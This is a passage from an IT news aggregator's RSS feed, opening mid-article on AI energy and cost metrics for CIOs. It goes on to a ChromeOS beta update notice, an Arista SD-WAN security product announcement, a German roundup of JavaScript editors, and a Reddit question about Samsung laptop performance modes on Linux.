<p class="wp-block-paragraph">In addition, explore new metrics and KPIs such as intelligence per watt to help make sense of your return on AI. Just as miles per gallon helps us evaluate new car purchases, IPW can help to measure the computational efficiency of a system. It quantifies how much intelligence — typically measured in AI inferences, tokens processed, or model training iterations — a processor can deliver for every watt of electrical power it consumes.</p>



<p class="wp-block-paragraph">According to Max Romanenko, chief engineering officer at relational database platform EDB, cost per query tells you almost nothing in an agentic world where autonomous systems are spinning up databases, pipelines, and queries around the clock. “The metric that matters is intelligence per watt, how much useful AI you get for every unit of energy you spend,” he says. “It isn’t just an environmental number, it’s also a performance indicator.”</p>



<p class="wp-block-paragraph">With the measurements in place, you can then start to manage and optimize each layer in the AI stack from the infrastructure, or hyperscaler, layer to your own data and application layers.</p>



<p class="wp-block-paragraph">It’s important to bear in mind that high token usage isn’t necessarily a bad thing. It depends on the net value delivered by each AI application and use case. Managing and optimizing the AI stack is important, but you’ll also want to measure the business value being delivered by each of these applications so you can measure your return.</p>



<h2 class="wp-block-heading">Take a sovereign AI approach when evaluating hyperscalers</h2>



<p class="wp-block-paragraph">As you work with hyperscalers like Amazon, Google and Microsoft, it’s important to understand how they charge and how much, but also their environmental footprints. For example, by reading their sustainability reports, you can find out their annual water consumption across their global data centers and compare them with other providers.</p>



<p class="wp-block-paragraph">In 2025, Amazon’s global data center operations used <a href="https://www.aboutamazon.com/news/sustainability/amazon-data-center-water-usage">0.12 liters of water per kilowatt-hour</a>, which amounts to 2.5 billion gallons, or 5% of the annual water consumed by the metro Seattle area. The company has been able to operate more than seven times better than the industry average and have improved their water efficiency by 52% since 2021.</p>



<p class="wp-block-paragraph">As demand for cloud computing and AI grows, water efficiency is another important metric for CIOs to monitor within hyperscaler ESG reports. While not at the same level of regulation as scope 2 and 3 greenhouse gas (GHG) emissions reporting, enterprises need to pay increasing attention to water use efficiency (WUE) with water scarcity becoming a growing risk for hyperscalers.</p>



<p class="wp-block-paragraph">The key requisite at the infrastructure layer, though, is to ensure sovereign AI. This doesn’t mean you need to own everything, but you need control over your AI-driven operations when conditions change. With <a href="https://www.ibm.com/thought-leadership/institute-business-value/en-us/report/ai-sovereignty">71% of global executives stating that switching their primary AI vendor or model would be difficult if required today</a>, it’s important to understand AI dependencies and be able to avoid vendor lock-in. </p>



<h2 class="wp-block-heading">Control efficiency at the data layer</h2>



<p class="wp-block-paragraph">The AI energy conversation has fixated on models and GPUs, but every agent, model, and inference call runs on the data layer beneath them, and that’s the one place a CIO can actually move the numbers.</p>



<p class="wp-block-paragraph">“You can’t control consumption at the model layer,” says Romanenko. “Agents consume what they consume. But you can control efficiency at the data layer, and for most enterprises that’s the only real lever they have. Optimize search, retrieval, and vector indexing where the work actually happens and you cut compute, cost, and carbon at the same time. Ignore it, and it’s like running the heat with every window open.”</p>



<p class="wp-block-paragraph">Ann Dunkin, distinguished professor of the practice at Georgia Tech, adds that CIOs who bring models in house and run them in their own infrastructure, or in the cloud infrastructure of their choosing, can have more control over the sustainability of inference, as well as of their costs and how their data is used.</p>



<h2 class="wp-block-heading">Fine tune the application layer</h2>



<p class="wp-block-paragraph">When balancing a mix of commercial AI packages and custom-built code, costs can quickly spiral due to inefficient design and orchestration, redundant APIs, and unoptimized model routing.</p>



<p class="wp-block-paragraph">With inference calls costing approximately 10 times that of conventional web queries, for custom AI applications, it’s important to design them to only use probabilistic code where necessary. Since many custom applications utilize a combination of both <a href="https://www.cio.com/article/4133150/4-tips-to-help-the-new-innovators-struggle-with-ai-and-traditional-code.html">probabilistic and deterministic code</a>, this is exactly where software developers need to make smart choices in their designs.</p>



<p class="wp-block-paragraph">Other techniques to fine tune the application layer include semantic caching, intelligent model routing, and internal AI capability registries. “CIOs can implement intelligent routing solutions to select the most cost-efficient model for every prompt,” says Dunkin. “The most flexible routing solutions can drop into a user’s existing environment and orchestrate the actions of the company’s existing models.”</p>



<p class="wp-block-paragraph">For CIOs looking to maximize the business value of every AI application in their portfolio, these new considerations, including new metrics, tools and approaches from the infrastructure layer all the way up to the application layer, should be an essential part of the equation.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beta Channel Update for ChromeOS / ChromeOS Flex]]></title>
<description><![CDATA[The Beta channel is being updated to OS version 16733.26.0 (Browser version 151.0.7922.42) for most ChromeOS devices.If you find new issues, please let us know one of the following ways:File a bugVisit our ChromeOS communitiesGeneral: Chromebook Help CommunityBeta Specific: ChromeOS Beta Help Com...]]></description>
<link>https://tsecurity.de/de/3685499/it-security-nachrichten/beta-channel-update-for-chromeos-chromeos-flex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685499/it-security-nachrichten/beta-channel-update-for-chromeos-chromeos-flex/</guid>
<pubDate>Wed, 22 Jul 2026 09:16:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The Beta channel is being updated to OS version 16733.26.0 (Browser version 151.0.7922.42) for most ChromeOS devices.</span></p><span><p dir="ltr"><span>If you find new issues, please let us know one of the following ways:</span></p><br><br><ol><li aria-level="1" dir="ltr"><p dir="ltr" role="presentation"><a href="https://bugs.chromium.org/p/chromium/issues/list"><span>File a bug</span></a></p></li><li aria-level="1" dir="ltr"><p dir="ltr" role="presentation"><span>Visit our ChromeOS communities</span></p></li><ol><li aria-level="2" dir="ltr"><p dir="ltr" role="presentation"><span>General:</span><a href="https://support.google.com/chromebook/community/?hl=en&amp;gpf=%23!forum%2Fchromebook-central"><span> </span><span>Chromebook Help Community</span></a></p></li><li aria-level="2" dir="ltr"><p dir="ltr" role="presentation"><span>Beta Specific:</span><a href="https://support.google.com/chromeos-beta/community"><span> </span><span>ChromeOS Beta Help Community</span></a></p></li></ol><li aria-level="1" dir="ltr"><p dir="ltr" role="presentation"><a href="https://support.google.com/chrome/answer/95315?hl=en&amp;co=GENIE.Platform%3DDesktop"><span>Report an issue or send feedback on Chrome</span></a></p></li><li aria-level="1" dir="ltr"><p dir="ltr" role="presentation"><span>Interested in switching channels?</span><a href="https://support.google.com/chromebook/answer/1086915"><span> </span><span>Find out how.</span></a></p></li></ol><br><p dir="ltr"><span>Andy Wu</span></p><p dir="ltr"><span>Google ChromeOS</span></p><div><span><br></span></div></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Arista debuts unified SD-WAN edge platform]]></title>
<description><![CDATA[Arista Networks is looking to simplify data protection at the edge of enterprise networks with a new security package that combines branch office security with SD-WAN connectivity in a single platform.



The company announced AI-driven Edge Threat Management (ETM) for VeloCloud SD-WAN, a platfor...]]></description>
<link>https://tsecurity.de/de/3685191/it-security-nachrichten/arista-debuts-unified-sd-wan-edge-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685191/it-security-nachrichten/arista-debuts-unified-sd-wan-edge-platform/</guid>
<pubDate>Wed, 22 Jul 2026 05:40:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Arista Networks is looking to simplify data protection at the edge of enterprise networks with a new security package that combines branch office security with SD-WAN connectivity in a single platform.</p>



<p class="wp-block-paragraph">The company announced AI-driven <a href="https://edge.arista.com/edge-threat-management/">Edge Threat Management</a> (ETM) for VeloCloud SD-WAN, a platform that links typically separate products and capabilities including Arista’s next-generation firewall, IP reputation, external blocklists, intrusion prevention, URL filtering, application classification, geo-IP filtering, network address translation, deep packet inspection, and zone-based segmentation. </p>



<p class="wp-block-paragraph">ETM provides perimeter protection at the WAN edge and is a software upgrade option to VeloCloud SD-WAN, according to Arista. It can help simplify branch operations with a common operating system, a uniform enforcement engine, and common end-to-end security policies, the vendor stated. The new ETM solution also leverages Arista’s AVA (Autonomous Virtual Assist) for AI-driven policy intelligence.</p>



<p class="wp-block-paragraph">“Multi-vendor branch complexity creates the ultimate blind spot, and your adversaries are actively hiding in it,” wrote <a href="https://www.linkedin.com/in/brendangibbs1/">Brendan Gibbs</a>, Arista’s vice president, AI, routing, and switching platforms, in a <a href="https://blogs.arista.com/blog/the-unified-edge-for-a-secure-branch">blog post</a> about the new platform.</p>



<p class="wp-block-paragraph">Sprawling multi-vendor infrastructure creates operational headaches and increases security risks, according to Gibbs. “When you have four or five different point solutions from different vendors stacked on top of each other, configuring them becomes a manual, disjointed process. In fact, industry data shows that up to 95% of network changes are still performed manually, which inevitably leads to configuration mistakes, the single biggest driver of network downtime and security policy gaps,” he wrote. </p>



<p class="wp-block-paragraph">“When security policies are decoupled from local network routing, critical blind spots emerge. An attacker doesn’t need to break your cloud-delivered SASE firewall; they just need to target the unmonitored local traffic gaps between your Wi-Fi AP, your LAN switch, and your SD-WAN edge router,” Gibbs wrote.</p>



<p class="wp-block-paragraph">ETM is integrated into VeloCloud Orchestrator as a dedicated enterprise application. “This enables security operators to configure policies that build on the same source of shared network configuration while maintaining a dedicated management console for security policy configuration, provisioning, and reporting,” Arista <a href="https://www.arista.com/assets/data/pdf/Datasheets/Arista-VeloCloud-SD-WAN-Edge-Threat-Management-Data-Sheet.pdf">stated</a>.</p>



<p class="wp-block-paragraph">ETM security policies are managed in VeloCloud Orchestrator. “Admins can build and assign reusable policies consisting of predefined objects and templates. This design makes updating security policies possible by a few simple clicks, while the associated changes are propagated throughout the network within minutes,” Arista stated.</p>



<p class="wp-block-paragraph">VeloCloud Orchestrator is the central management, configuration, and monitoring hub for VeloCloud SD-WAN and SASE networks.</p>



<p class="wp-block-paragraph">In addition, VeloCloud edge routers collect threat intelligence data from a variety of sources to determine in real-time the trustworthiness and identity of hosts inside and outside the network. Through integration with <a href="https://www.arista.com/assets/data/pdf/Datasheets/Arista-NDR-Datasheet.pdf">Arista Network Detection and Response</a> and other web-based dynamic lists, administrators can identify suspicious hosts and build policies to block potentially harmful activities, the <a href="https://www.arista.com/assets/data/pdf/Datasheets/Arista-VeloCloud-SD-WAN-Edge-Threat-Management-Data-Sheet.pdf">vendor stated</a>.</p>



<p class="wp-block-paragraph">Integration with Arista’s AVA policy assistant is aimed at simplifying management of branch security policies. AVA continuously analyzes configuration states and translates complex, multi-site security rules into plain English, Gibbs explained. For example, NetOps administrators can use AI with Ask AVA to predict “how specific traffic will be handled before committing to a deployment, preventing manual configuration errors that leave branches exposed,” Gibbs wrote.</p>



<p class="wp-block-paragraph">Arista also touted support for network-wide segmentation policies. “The flexible security policy configuration within the Edge Threat Management policy management extends the security coverage from the data center to the branch,” the vendor stated. “Security operations administrators can build access policies that are enforced across a distributed network. The centralized design enables admins to configure and deploy consistent zone based policies across the entire distributed network.”</p>



<p class="wp-block-paragraph">ETM is a significant addition to the Arista VeloCloud portfolio. Arista <a href="https://www.networkworld.com/article/4016270/arista-buys-velocloud-to-reboot-sd-wans-amid-ai-infrastructure-shift.html">bought</a> the VeloCloud SD-WAN platform from Broadcom a year ago and has been promising new technologies that expand the platform. ETM also could further the vendor’s <a href="https://www.networkworld.com/article/4111354/arista-rides-ai-wave-but-battle-for-campus-networks-looms.html">stated plans to expand beyond its data center networking roots</a> and compete more broadly with enterprise networking vendors such as Cisco, Palo Alto Networks, and Fortinet.</p>



<p class="wp-block-paragraph">In the SASE and SD-WAN world, vendors such as Cisco, Palo Alto, Fortinet, Cato Networks, and Versa Networks are among the most balanced suppliers, with both SD-WAN and SSE contributing meaningful revenue streams, according to a recently published <a href="https://www.delloro.com/news/sase-1q-2026-revenue-climbs-21-percent-to-over-3-b-driven-by-ai-governance/">report</a> from Dell’Oro Group.</p>



<p class="wp-block-paragraph">“We forecast that SASE will remain on a double-digit growth path in 2026, with SSE-first rollouts remaining the most common entry point, and SD-WAN supported by branch modernization, software attach, and branch security refresh,” Dell Oro stated.</p>



<p class="wp-block-paragraph">“AI is changing the SASE discussion from access and inspection to governance, data protection, and control over agents and machine traffic,” Mauricio Sanchez, senior director, enterprise security and networking at Dell’Oro Group, stated in the report. “A 21 percent Y/Y quarter shows that SASE is not waiting for a future AI refresh cycle; it is already absorbing the early security and networking requirements created by AI adoption,” Sanchez added.</p>



<p class="wp-block-paragraph">ETM for VeloCloud SD-WAN will be available in Q4 of 2026 and will be available for all current VeloCloud hardware and virtual edge platforms.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten JavaScript-Editoren]]></title>
<description><![CDATA[width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px">Diese Texteditoren bringen JavaScript-Developer weiter.  R.Narong | shutterstock.com



JavaScript-Entwicklern stehen viele gute Tools zur Auswahl. Beinahe zu viele, um den Überblick zu behalten. In diesem Artikel stellen w...]]></description>
<link>https://tsecurity.de/de/3685190/it-security-nachrichten/die-besten-javascript-editoren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685190/it-security-nachrichten/die-besten-javascript-editoren/</guid>
<pubDate>Wed, 22 Jul 2026 05:40:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Diese Texteditoren bringen JavaScript-Developer weiter.  </figcaption></figure><p class="imageCredit">R.Narong | shutterstock.com</p></div>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2832952/was-ist-javascript.html" target="_blank">JavaScript</a>-Entwicklern stehen viele gute Tools <a href="https://www.computerwoche.de/article/2821289/7-javascript-projekte-die-sie-kennen-sollten.html" target="_blank">zur Auswahl</a>. Beinahe <a href="https://www.computerwoche.de/article/2833386/die-besten-javascript-frameworks-im-vergleich.html" target="_blank">zu viele</a>, um den Überblick zu behalten. In diesem Artikel stellen wir Ihnen die besten Texteditoren vor, um:</p>



<ul class="wp-block-list">
<li>mit JavaScript, HTML5 und CSS zu entwickeln, sowie</li>



<li>mit <a href="https://www.computerwoche.de/article/3995075/was-ist-markdown.html" target="_blank">Markdown</a> zu dokumentieren.</li>
</ul>



<h2 class="wp-block-heading"><a href="https://www.sublimetext.com/" target="_blank" rel="noreferrer noopener">Sublime Text</a></h2>



<p class="wp-block-paragraph">Bei Sublime Text sind Sie genau richtig, wenn:</p>



<ul class="wp-block-list">
<li>Sie einen flexiblen, leistungsstarken, erweiterbaren und ausgesprochen schnellen Code-Editor suchen.</li>



<li>es Ihnen nichts ausmacht, für Code Checking, Debugging und Deployment zu anderen Fenstern zu wechseln.  </li>
</ul>



<p class="wp-block-paragraph">Zu den vielen weiteren, bemerkenswerten Stärken von <a href="https://www.computerwoche.de/article/3607168/code-editor-vergleich-visual-studio-code-vs-sublime-text.html" target="_blank">Sublime Text</a> gehören neben seiner Geschwindigkeit und dem Support für mehr als 70 Datei-Typen (darunter JavaScript, HTML und CSS) auch noch:</p>



<ul class="wp-block-list">
<li>Instant-Navigation und Projekt-Switching,</li>



<li>die Option, eine Reihe von Änderungen per Mehrfachauswahl „auf einen Schlag“ auszuführen,</li>



<li>Support für mehrere Bildschirme und Split-Windows,</li>



<li>eine Plug-in-API auf Python-Basis, sowie</li>



<li>eine einheitliche, durchsuchbare Befehlspalette.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Sublime Text ist in vielerlei Hinsicht konfigurier- und anpassbar. </figcaption></figure><p class="imageCredit">IDG</p></div>




<p class="wp-block-paragraph">Für Programmierer, die von anderen Editoren kommen, hilfreich: Sublime Text unterstützt sowohl TextMate-Bundles (ohne Befehle) als auch die Vi/Vim-Emulation. Dabei lässt sich der Code-Editor in so gut wie jeder Hinsicht anpassen, egal, ob es um Farbschemata, Schriftarten, Tastenkombinationen, Snippets oder die Regeln für die Syntaxhervorhebung geht.</p>



<p class="wp-block-paragraph">Rund um Sublime Text existiert ebenfalls eine aktive Community, die Packages und Plug-ins erstellt und pflegt. Mit Hilfe des <a href="https://sublime.wbond.net/browse" target="_blank" rel="noreferrer noopener">Package Installers</a> sind diverse zusätzliche Funktionen verfügbar.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: unbegrenzte kostenlose Testversion; 65 Dollar pro Jahr und Seat für die Business-Version; 99 Dollar für eine Privatlizenz (Support für drei Jahre);</li>



<li><strong>Plattformen</strong>: Windows, macOS und Linux;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://code.visualstudio.com/" target="_blank" rel="noreferrer noopener">Visual Studio Code</a></h2>



<p class="wp-block-paragraph">Visual Studio Code ist ein quelloffener, kostenloser Editor von Microsoft. Er enthält einen Mix aus Komponenten von Visual Studio und der Open-Source-Shell Atom Electron und bietet umfassenden Support für:</p>



<ul class="wp-block-list">
<li>ASP.Net Core Development mit C# und</li>



<li>Node.js Development mit TypeScript und JavaScript.</li>
</ul>



<p class="wp-block-paragraph">Dank des TypeScript-Compilers und der Salsa-Engine bietet <a href="https://www.computerwoche.de/article/2833165/10-tricks-fuer-visual-studio-code.html" target="_blank">Visual Studio Code</a> eine erstaunlich gute JavaScript-Codevervollständigung. Dazu sendet VS Code Ihren JavaScript-Code im Hintergrund an den TypeScript-Compiler, um Typen abzuleiten und eine Symboltabelle zu erstellen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Visual Studio Code darf in einer Auflistung der besten JavaScript-Editoren nicht fehlen.</figcaption></figure><p class="imageCredit">IDG</p></div>




<p class="wp-block-paragraph">Während Sie eine Expression eingeben, ermöglicht dieselbe Symboltabelle es IntelliSense, diverse nützliche Pop-up-Optionen zur Codevervollständigung zur Verfügung zu stellen.</p>



<p class="wp-block-paragraph">Der Support für <a href="https://www.computerwoche.de/article/2812266/was-ist-git.html" target="_blank">Git</a> ist umfangreich und simpel zu nutzen, der VS-Code-Debugger bietet eine hervorragende Erfahrung für Node.js und ASP.Net-Projekte. Visual Studio Code kann darüber hinaus auch mit externen Task-Runnern wie gulp und jake integriert werden und kann mit einem umfangreichen Ökosystem für Extensions aufwarten.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattformen</strong>: Windows, macOS, Linux;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://brackets.io/?lang=de" target="_blank" rel="noreferrer noopener">Brackets</a></h2>



<p class="wp-block-paragraph">Brackets ist ein kostenloser Open-Source-Editor, der ursprünglich von Adobe stammt. Das Ziel der Entwickler: Bessere Tools für JavaScript, HTML, CSS und verwandte, offene Webtechnologien bereitzustellen. Auch Brackets selbst ist in JavaScript, HTML und CSS geschrieben.</p>



<p class="wp-block-paragraph">Zusätzlich zu den integrierten Funktionen verfügt Brackets über einen Extension Manager. Der ist auch nötig, denn die sind für diverse Programmiersprachen und Tools aus der Welt der <a href="https://www.computerwoche.de/article/2824968/3-wege-zum-vorzeige-frontend.html" target="_blank">Frontend-Entwickler</a> verfügbar. In der Praxis ist Brackets zwar nicht so schnell wie Sublime Text (siehe weiter oben) oder TextMate (siehe weiter unten). Aber der Editor ist immer noch schnell genug. Brackets bietet umfassenden Support für:</p>



<ul class="wp-block-list">
<li>JavaScript,</li>



<li>CSS,</li>



<li>HTML und</li>



<li>Node.js.</li>
</ul>



<p class="wp-block-paragraph">Darüber hinaus bietet Brackets weitere nützliche Funktionen wie beispielsweise:</p>



<ul class="wp-block-list">
<li>CSS inline in Verbindung mit einer HTML-ID bearbeiten,</li>



<li>eine übersichtliche Benutzeroberfläche und</li>



<li>eine Live-Vorschau für Webseiten in Bearbeitung.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Brackets ist in erster Linie für die Webentwicklung konzipiert.</figcaption></figure><p class="imageCredit">IDG</p></div>




<p class="wp-block-paragraph">Auch beim Blick auf die automatische Vervollständigung von JavaScript-Code kann Brackets in der Praxis überzeugen: Es schließt automatisch sämtliche Klammern und stellt Dropdown-Menüs für Keywords, Variablen und Methoden zur Verfügung. Der JavaScript-Editor ist auch in der Lage, den Node.js-Debugger zu steuern und Node über ein Menüelement neu zu starten. Erweiterungen für zusätzliche Funktionen wie <a href="https://www.computerwoche.de/article/2794625/was-javascript-von-typescript-unterscheidet.html" target="_blank">TypeScript</a>– und <a href="https://www.computerwoche.de/article/2831038/html-das-javascript-kann.html" target="_blank">JSX</a>-Support, Bower- und Git-Integration lassen sich schnell und einfach hinzufügen.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattformen</strong>: Windows, macOS, Linux;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://github.com/atom" target="_blank" rel="noreferrer noopener">Atom</a></h2>



<p class="wp-block-paragraph">Dieser kostenlose, quelloffene und “hack”-bare Programmier-Editor stammt aus dem Hause GitHub und lässt sich in die entsprechende Anwendung integrieren. Tausende von Packages und Themes stehen zur Verfügung, um Atom anzupassen. Der Quellcode von Atom wird selbstverständlich auch auf GitHub gehostet, ist in CoffeeScript geschrieben und in Node.js integriert.</p>



<p class="wp-block-paragraph">Bei Atom handelt es sich um eine spezialisierte Variante von Chromium, die eher als Texteditor denn als Webbrowser konzipiert ist. Jedes Atom-Fenster ist im Wesentlichen eine lokal gerenderte Webseite.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Der Open-Source-Editor von GitHub kann in der Praxis überzeugen.</figcaption></figure><p class="imageCredit">IDG</p></div>



<p class="wp-block-paragraph">In der Praxis zeigt sich Atom performant. Der Editor ist sofort einsatzbereit und überzeugt unter anderem mit:</p>



<ul class="wp-block-list">
<li>einem “Fuzzy-Finder”,</li>



<li>der Möglichkeit, schnell und projektübergreifend zu suchen,</li>



<li>Multi-Cursor- und Windows-Optionen,</li>



<li>Snippets und Code-Folding sowie</li>



<li>der Möglichkeit, TextMate-Grammatiken und -Themen zu importieren.</li>
</ul>



<p class="wp-block-paragraph">Atom ist insbesondere praktisch, um Repositories zu durchsuchen, die von GitHub geklont wurden, weil die GitHub-Applikation zu diesem Zweck ein Kontextmenüelement enthält.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattformen</strong>: Windows, macOS, Linux;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://notepad-plus-plus.org/" target="_blank" rel="noreferrer noopener">Notepad++</a></h2>



<p class="wp-block-paragraph">Ein weiterer kostenloser Open-Source-Editor, der gut für JavaScript geeignet ist – allerdings nur auf Windows läuft. Notepad++ unterstützt außerdem etwa 50 weitere Programmier- und Markup-Sprachen. Neben seinem Multi-Document-Editing-Fenster bietet dieser Editor auch eine “Workspace Tree View”, sowie Registerkarten mit Funktionslisten und Dokumentenübersicht. In der Praxis bekommt man dabei nie das Gefühl, ausgebremst zu werden.</p>



<p class="wp-block-paragraph">Mit Syntax-Farb- und -Folding-Optionen, leistungsstarken Editing-Funktionen sowie Paramter-Hints hat Notepad++ das Zeug zum primären JavaScript-Texteditor. Allerdings ist es bei weitem nicht der umfassendste JavaScript-Editor, wenn es darum geht:</p>



<ul class="wp-block-list">
<li>Code zu generieren,</li>



<li>Refactoring anzustoßen oder</li>



<li>schnell durch große Projekte zu navigieren.</li>
</ul>



<p class="wp-block-paragraph">Nichtsdestotrotz ist Notepad++ ist auch heute noch nützlich – vor allem, wenn es schnell und kostenlos gehen muss.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattform</strong>: Windows;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://www.barebones.com/products/bbedit/" target="_blank" rel="noreferrer noopener">BBEdit</a></h2>



<p class="wp-block-paragraph">Mit BBEdit steht auch für macOS-Benutzer ein proprietärer JavaScript-Editor bereit. Er unterstützt etwa 35 Programmier- und Markup-Sprachen. Für viele weitere Sprachen ist Community-Support (von unterschiedlicher Qualität) über die BBEdit-Website verfügbar. Sowohl die kostenlose als auch die lizenzierte Version bieten Syntaxhervorhebung. Code-Vervollständigung für Funktions- und Variablennamen, einige Keywords und ctags bleiben den Nutzern der kostenpflichtigen Version vorbehalten. Diese lässt sich auch in die <a href="https://www.computerwoche.de/article/2833711/version-control-systems-ein-ratgeber.html" target="_blank">Versionskontrollsysteme</a> Git, Perforce und Subversion integrieren.</p>



<p class="wp-block-paragraph">BBEdit wurde bereits vor einiger Zeit grundlegend überarbeitet und überzeugt in der Praxis nun auch, wenn es größere Dateien verarbeiten muss. Auch was HTML und Markdown angeht, gibt es nichts zu beanstanden – das funktioniert sogar besser als JavaScript.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlose aber eingeschränkte Version; 59,99 Dollar pro Benutzer für die Vollversion;</li>



<li><strong>Plattform</strong>: macOS;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://macromates.com/" target="_blank" rel="noreferrer noopener">TextMate</a></h2>



<p class="wp-block-paragraph">Dieser (ebenfalls macOS-exklusive) Code-Editor war einmal der letzte Schrei, verlor dann stark an Bedeutung und wird inzwischen wieder aktiv weiterentwickelt. TextMate ist zwar keine IDE, lässt sich aber über Bundles, Snippets, Makros und sein Scoping-System mit Funktionen ausstatten, die selbst sprachspezifische Entwicklungsumgebungen vermissen lassen. Was die Geschwindigkeit angeht, ist TextMate fast so schnell wie Sublime Text.</p>



<p class="wp-block-paragraph">Für eine IDE-ähnliche Funktionalität können Sie die Shell-Integration von TextMate verwenden, erwarten Sie aber kein Code Refactoring oder automatische Unit- und Regressionstests. Wenn Sie Grunt richtig einrichten, können Sie Ihre JavaScript-Tests auf dieser Ebene natürlich trotzdem automatisieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">TextMate bietet diverse Bundles.</figcaption></figure><p class="imageCredit">IDG</p></div>




<p class="wp-block-paragraph">Auch Support für Markdown wird über ein integriertes Bundle bereitgestellt. Dieses enthält:</p>



<ul class="wp-block-list">
<li>eine Preview-Funktion für Dokumente,</li>



<li>ein Markdown-„Cheatsheet“ sowie</li>



<li>diverse Tastenkombinationen, um Markup zu generieren.</li>
</ul>



<p class="wp-block-paragraph">Um TextMate mit Git und GitHub zu integrieren, eignet sich hingegen das Git-Bundle gut. In der Praxis erkennt TextMate vorhandene Git-Repositories und kann diese per Pull-Befehl aus dem Bundle von GitHub aktualisieren. Mit dem SQL-Bundle können Sie mit MySQL- und PostgreSQL-Datenbanken arbeiten.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattform</strong>: macOS;</li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.infoworld.com/article/2252269/review-the-10-best-javascript-editors.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung Performance Mode on Linux]]></title>
<description><![CDATA[Hey everyobody. I'll start by saying I don't know much about computer stuff and Linux but it's been a year since I've been considering switching to a Linux distro. I just can't stand all the Windows bloatwere and useless features that get my RAM full. The only thing keeping me from totally switch...]]></description>
<link>https://tsecurity.de/de/3685111/linux-tipps/samsung-performance-mode-on-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685111/linux-tipps/samsung-performance-mode-on-linux/</guid>
<pubDate>Wed, 22 Jul 2026 04:12:18 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey everyobody. I'll start by saying I don't know much about computer stuff and Linux but it's been a year since I've been considering switching to a Linux distro. I just can't stand all the Windows bloatwere and useless features that get my RAM full. The only thing keeping me from totally switching is the samsung's built-in performance mode selector. See, I bought this Galaxy Book 2 Pro SE a year ago and as you may know Samsung has a couple cool features on their laptops; this feature in particular is really useful for the use I do of my laptop, and I couldn't find an answer online about my doubt. I can switch between 4 different performance modes (from No Noise to High Performance) and since that's a Samsung's feature I don't know if that will work if I switch. Do y'all know if there's a way to have this feature on Linux or some equivalent? I don't know if what I'm asking is dumb, thanks for your time anyway!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/fferdyz"> /u/fferdyz </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v2zk76/samsung_performance_mode_on_linux/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v2zk76/samsung_performance_mode_on_linux/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Visual Studio Code 1.129 introduces dedicated agent host]]></title>
<description><![CDATA[Microsoft has released Visual Studio Code 1.129, an update to its free, popular code editor that features a dedicated agent host and an editor panel in the Agents window. The updated editor also allows users to run terminal commands from chat prompts with a !prefix and offers a preview of a moder...]]></description>
<link>https://tsecurity.de/de/3685030/ai-nachrichten/visual-studio-code-1129-introduces-dedicated-agent-host/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685030/ai-nachrichten/visual-studio-code-1129-introduces-dedicated-agent-host/</guid>
<pubDate>Wed, 22 Jul 2026 01:49:03 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
